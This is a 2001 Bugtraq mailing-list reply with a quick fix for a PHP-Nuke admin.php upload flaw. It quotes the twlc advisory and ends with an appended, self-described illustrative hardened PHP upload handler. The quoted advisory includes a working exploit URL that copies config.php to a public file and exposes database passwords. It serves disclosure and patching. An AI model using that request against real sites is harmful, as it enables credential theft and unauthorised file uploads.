Alternative "quickfix"; change "if($upload) {" to "if (($upload) && ($admintest)) {"

This at least works for PostNuke 0.62. I have not tested the latest PostNuke 0.63 - it may be vulnerable as well...

And btw; if you're not going to use the filemanager, disallow write access for the webuser (usually nobody or www) to all files/directories below webroot.

Magnus Skjegstad

----- Original Message -----
From: <supergate@twlc.net>
To: "bugtraq" <bugtraq@securityfocus.com>
Sent: Monday, September 24, 2001 9:31 PM
Subject: twlc advisory: all versions of php nuke are vulnerable...

> Explanation
> Do you need sql password?
>
> http://www.server.net/admin.php?upload=1&file=config.php&file_name=hacked.txt&wdir=/images/&userfile=config.php&userfile_name=hacked.txt
>
> the admin 'login' page will be prompted, just go to
> http://www.server.net/images/hacked.txt and you will see config.php, which as
> everyone knows contains the sql passwords, you can even upload files...i
> leave you the 'fun' to find all the ways to use it... and try not to be a
> SCRIPT KIDDIE, we wrote this advisory to help those who run php nuke and NOT TO
> LET YOU HAVE FUN.
>
> let me explain the bug to you... admin.php contains this routine:
>
> $basedir = dirname($SCRIPT_FILENAME);
> $textrows = 20;
> $textcols = 85;
> $udir = dirname($PHP_SELF);
> if(!$wdir) $wdir="/";
> if($cancel) $op="FileManager";
> if($upload) {
>     copy($userfile,$basedir.$wdir.$userfile_name);
>     $lastaction = ""._UPLOADED." $userfile_name --> $wdir";
>     // This need a rewrite -------------------------------------> OMG! WE AGREEEEEEEE lmao
>     //include("header.php");
>     //GraphicAdmin($hlpfile);
>     //html_header();
>     //displaydir();
>     $wdir2="/";
>     chdir($basedir . $wdir2);
>     //CloseTable();
>     //include("footer.php");
>     Header("Location: admin.php?op=FileManager");
>     exit;
> }
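
A hardened form of the quoted upload branch, as an added example that is not PHP-Nuke or PostNuke code and not part of either message: it keeps the admin check from the quick fix and also stops trusting the request-supplied $userfile, $userfile_name and $wdir values. The function names, the $isAdmin parameter (standing in for the application's own $admintest result) and the extension allow-list are assumptions made for illustration.

```php
<?php
// Added example, not project code. Names and the allow-list are hypothetical.

// Build the destination path, or return null if the request tries to leave
// $basedir or uses a file name/extension we do not accept.
function safe_upload_target(string $basedir, string $wdir, string $name): ?string
{
    $base = realpath($basedir);
    $dir  = realpath($basedir . '/' . $wdir);   // resolves ".." and symlinks
    if ($base === false || $dir === false) {
        return null;
    }
    $prefix = $base . DIRECTORY_SEPARATOR;
    if ($dir !== $base && strncmp($dir, $prefix, strlen($prefix)) !== 0) {
        return null;                            // $wdir escaped the base directory
    }
    $file = basename($name);                    // drop client-supplied path parts
    $ext  = strtolower(pathinfo($file, PATHINFO_EXTENSION));
    $allowed = ['gif', 'jpg', 'jpeg', 'png', 'txt'];   // constructed allow-list
    if ($file === '' || !in_array($ext, $allowed, true)) {
        return null;                            // e.g. refuses *.php in the webroot
    }
    return $dir . DIRECTORY_SEPARATOR . $file;
}

// Replacement for the body of "if($upload) { copy(...) }".
// $files is expected to be $_FILES; $isAdmin is the result of the admin check.
function handle_upload(bool $isAdmin, array $files, string $basedir, string $wdir): bool
{
    if (!$isAdmin) {
        return false;                           // the check the quick fix adds
    }
    if (!isset($files['userfile']) || $files['userfile']['error'] !== UPLOAD_ERR_OK) {
        return false;
    }
    $tmp = $files['userfile']['tmp_name'];
    // Only accept a file PHP itself received via HTTP POST. A path such as
    // "config.php" passed in as a request variable fails this test.
    if (!is_uploaded_file($tmp)) {
        return false;
    }
    $target = safe_upload_target($basedir, $wdir, $files['userfile']['name']);
    if ($target === null) {
        return false;
    }
    return move_uploaded_file($tmp, $target);
}
```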